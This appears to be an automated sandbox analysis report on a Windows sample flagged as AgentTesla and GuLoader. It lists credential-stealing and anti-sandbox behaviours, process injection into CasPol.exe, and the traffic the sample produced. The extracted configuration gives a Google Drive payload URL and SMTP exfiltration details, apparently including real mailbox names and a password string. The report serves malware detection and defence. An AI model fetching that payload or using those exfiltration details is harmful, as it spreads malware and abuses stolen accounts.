Loading ...

Play interactive tourEdit tour

Windows Analysis Report n#U00ba410000512664.exe

Overview

General Information

Sample Name:n#U00ba410000512664.exe
Analysis ID:526313
MD5:7c91db57c98a1f0e38ba65ed651b4779
SHA1:28cb0d40a73c1a421a9720808d49da010f9ff4ef
SHA256:12992fe3f998693d92625c53bf5aa6723e87c8c3fb7057dbba4b334742cab376
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • n#U00ba410000512664.exe (PID: 8012 cmdline: "C:\Users\user\Desktop\n#U00ba410000512664.exe" MD5: 7C91DB57C98A1F0E38BA65ED651B4779)
    • CasPol.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\n#U00ba410000512664.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "arealaboral@neopyme.comnJm038qQkPmail.neopyme.cominfo.baldorns@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlo_"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.777892821.0000000000D00000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 4676JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 4676JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000008.00000000.777892821.0000000000D00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlo_"}
            Source: CasPol.exe.4676.8.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "arealaboral@neopyme.comnJm038qQkPmail.neopyme.cominfo.baldorns@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: n#U00ba410000512664.exeReversingLabs: Detection: 26%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01082F08 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01083509 CryptUnprotectData,
            Source: n#U00ba410000512664.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49765 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downlo_
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 54.36.109.179 54.36.109.179
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugon2ln1s6q81d25lmk78u5skq/1637587350000/06007705055686197661/*/12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-5k-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49783 -> 54.36.109.179:587
            Source: global trafficTCP traffic: 192.168.11.20:49783 -> 54.36.109.179:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000008.00000002.5712895682.000000001DE88000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpString found in binary or memory: http://XrlCbH.com
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: CasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: CasPol.exe, 00000008.00000002.5721075319.000000001FF60000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
            Source: CasPol.exe, 00000008.00000003.1882378616.000000002002C000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5725497851.00000000213B8000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b61ccc3ab858
            Source: CasPol.exe, 00000008.00000003.1882378616.000000002002C000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en8
            Source: CasPol.exe, 00000008.00000003.1882378616.000000002002C000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b61ccc3ab
            Source: CasPol.exe, 00000008.00000002.5714737652.000000001DF21000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5713990797.000000001DEDD000.00000004.00000001.sdmpString found in binary or memory: http://gZr4dT3tmP.org
            Source: CasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmpString found in binary or memory: http://mail.neopyme.com
            Source: CasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmpString found in binary or memory: http://neopyme.com
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/09
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: n#U00ba410000512664.exeString found in binary or memory: http://topqualityfreeware.com
            Source: n#U00ba410000512664.exeString found in binary or memory: http://www.topqualityfreeware.com/
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: CasPol.exe, 00000008.00000002.5721809838.0000000020016000.00000004.00000001.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: CasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/
            Source: CasPol.exe, 00000008.00000003.911628810.000000000124E000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/&
            Source: CasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000003.911628810.000000000124E000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ug
            Source: CasPol.exe, 00000008.00000002.5690976626.00000000011F9000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000008.00000002.5684651604.0000000000ED0000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5691534029.000000000120D000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq
            Source: CasPol.exe, 00000008.00000002.5691534029.000000000120D000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq/?
            Source: CasPol.exe, 00000008.00000003.907366419.000000000124E000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7JqHAy6h3LI2Eg_WKr50
            Source: CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugon2ln1s6q81d25lmk78u5skq/1637587350000/06007705055686197661/*/12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-5k-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49765 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: n#U00ba410000512664.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004090A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4BA78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4C7D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00CA6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00CA07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0102D9E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01027BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_010244F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01023330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_010272C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01080040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0108C330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0108BA15
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01087D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01084DD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0108EC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01084198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0108003D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01084548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01087C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01102050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_011050C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01101800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01106CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_011080A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1DCC5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1DCC46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1DCC6AF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01027BEC
            Source: n#U00ba410000512664.exe, 00000000.00000000.624813038.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObumbration1.exe vs n#U00ba410000512664.exe
            Source: n#U00ba410000512664.exeBinary or memory string: OriginalFilenameObumbration1.exe vs n#U00ba410000512664.exe
            Source: n#U00ba410000512664.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: n#U00ba410000512664.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: n#U00ba410000512664.exeReversingLabs: Detection: 26%
            Source: n#U00ba410000512664.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\n#U00ba410000512664.exe "C:\Users\user\Desktop\n#U00ba410000512664.exe"
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\n#U00ba410000512664.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\n#U00ba410000512664.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3DJump to behavior
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeFile created: C:\Users\user\AppData\Local\Temp\~DF8D00AB13BF3C3E52.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000008.00000000.777892821.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404401 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00403826 push es; ret
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004044E5 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404584 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404599 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004051BE push dword ptr [esi]; iretd
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_0040665D pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404279 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004062C1 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004072E1 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004096FC push eax; iretd
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404349 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_00404335 pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_0040633D pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_004067DE pushfd ; retf
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_0040A784 push 18165C0Eh; iretd
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeCode function: 0_2_022920FE push ss; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4E5E0 push ds; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4E5D0 push ds; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4C6C9 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4C7D0 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C4D788 push ss; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01026500 push ecx; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01026510 push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0102D18E push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0102D1F2 pushad ; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01026C0B push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01026C08 push esi; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01026C11 push esi; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0102C341 push 8BFFFFFFh; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0102CE1A pushad ; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
